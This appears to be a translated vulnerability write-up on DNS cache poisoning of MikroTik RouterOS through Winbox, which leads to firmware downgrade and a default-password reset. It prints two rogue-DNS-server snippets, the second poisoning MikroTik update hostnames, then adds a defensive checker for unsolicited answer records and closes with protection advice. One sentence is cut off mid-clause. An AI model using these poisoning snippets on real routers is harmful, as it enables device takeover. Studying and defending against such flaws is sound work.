The ability to remotely downgrade devices running RouterOS (MikroTik) puts thousands of network devices at risk. The vulnerability is related to DNS cache poisoning through the Winbox protocol and allows outdated firmware (with a reset to the default password) or modified firmware to be loaded onto the device.
Vulnerability details
The RouterOS terminal supports the resolve command for DNS lookups.
This request is handled by a binary called resolver. Resolver is one of many binaries that hook into the RouterOS Winbox protocol. At a high level, "messages" sent to the Winbox port can be routed to different binaries in RouterOS based on an array-based numbering scheme.
By default, RouterOS has the DNS server feature disabled.
However, even when the server functionality is disabled, the router maintains its own DNS cache.
When we make a request using winbox_dns_request for example.com, the router caches the result.
Since we can specify the DNS server that the request should go through, feeding it incorrect addresses is trivial. For example, you can set up a DNS server implementation from
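    from dnslib import DNSRecord, DNSHeader, RR, A

    def dns_response(data):
        # Parse the incoming query and build a reply with the same ID and question
        request = DNSRecord.parse(data)
        reply = DNSRecord(DNSHeader(
            id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
        qname = request.q.qname
        qn = str(qname)
        # Answer every query with the same fixed address
        reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
        print("---- Reply:\n", reply)
        return reply.pack()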
Now if you look up example.com using Winbox, you can see that the router's DNS cache has been poisoned.
Of course, poisoning example.com is not very useful, since the router will never actually use it. However, the router does need to reach upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com and download.mikrotik.com. And thanks to another bug, it is possible to poison all of them at once.
    from dnslib import DNSRecord, DNSHeader, RR, A

    def dns_response(data):
        request = DNSRecord.parse(data)
        reply = DNSRecord(DNSHeader(
            id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
        qname = request.q.qname
        qn = str(qname)
        # Answer for the name that was actually asked
        reply.add_answer(RR(qn, ttl=30, rdata=A("192.168.88.250")))
        # Four extra answers for names that were not asked, with a one-week TTL
        reply.add_answer(RR("upgrade.mikrotik.com", ttl=604800,
                            rdata=A("192.168.88.250")))
        reply.add_answer(RR("cloud.mikrotik.com", ttl=604800,
                            rdata=A("192.168.88.250")))
        reply.add_answer(RR("cloud2.mikrotik.com", ttl=604800,
                            rdata=A("192.168.88.250")))
        reply.add_answer(RR("download.mikrotik.com", ttl=604800,
                            rdata=A("192.168.88.250")))
        print("---- Reply:\n", reply)
        return reply.pack()
The router requests one resolution, and we give back five. The router does not cache these responses correctly: all of them end up in the cache.
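One way a resolver can refuse such answers before caching them, shown as an added example that is not code from the original article or from MikroTik: it parses a raw DNS response and reports every answer record whose owner name was not asked for (directly or through a CNAME in the same response). The function names are hypothetical, the check assumes a single-question response, and the sample packets are constructed with documentation addresses.

```python
import struct

def encode_name(name):
    """Encode a dotted name into DNS wire format (no compression)."""
    parts = name.rstrip(".").split(".")
    return b"".join(bytes([len(p)]) + p.encode("ascii") for p in parts) + b"\x00"

def read_name(msg, off):
    """Decode a possibly compressed name; return (lowercase FQDN, next offset)."""
    labels, resume, hops = [], None, 0
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:                      # compression pointer
            resume = off + 2 if resume is None else resume
            off = ((n & 0x3F) << 8) | msg[off + 1]
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
        elif n == 0:                              # root label ends the name
            return ".".join(labels).lower() + ".", (off + 1 if resume is None else resume)
        else:
            labels.append(msg[off + 1:off + 1 + n].decode("ascii", "replace"))
            off += 1 + n

def unsolicited_answers(msg):
    """Owner names in the answer section that the single question never asked for."""
    _id, _flags, _qd, ancount = struct.unpack_from("!HHHH", msg, 0)
    qname, off = read_name(msg, 12)
    off += 4                                      # skip QTYPE and QCLASS
    wanted, rejected = {qname}, []
    for _ in range(ancount):
        owner, off = read_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10
        if owner not in wanted:
            rejected.append(owner)                # must not be cached
        elif rtype == 5:                          # CNAME target becomes a valid owner
            wanted.add(read_name(msg, off)[0])
        off += rdlen
    return rejected

def build_response(qname, answers):
    """Constructed sample packet: one question plus A records (name, IPv4)."""
    msg = struct.pack("!HHHHHH", 0x1234, 0x8580, 1, len(answers), 0, 0)
    msg += encode_name(qname) + struct.pack("!HH", 1, 1)
    for name, ip in answers:
        msg += encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4)
        msg += bytes(int(o) for o in ip.split("."))
    return msg
```

A response for which `unsolicited_answers()` returns a non-empty list is also a useful detection signal when replaying captured DNS traffic from a router's upstream link.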
Obviously, this attack is also useful when the router is acting as a DNS server, since it allows the router's clients to be attacked.
This attack also lets you exploit a more serious vulnerability: downgrading or rolling back the RouterOS version. The attacker recreates the logic of the update server, including the changelog, and forces RouterOS to treat an outdated (vulnerable) version as the current one. The danger here is that when the version is "updated", the administrator password is reset to the default value, so an attacker can log in to the system with an empty password!
The attack works quite well, despite the fact that
Protection
Simply disabling Winbox protects you from these attacks. Despite the convenience of administration through Winbox, it is better to use the SSH protocol.
source: www.habr.com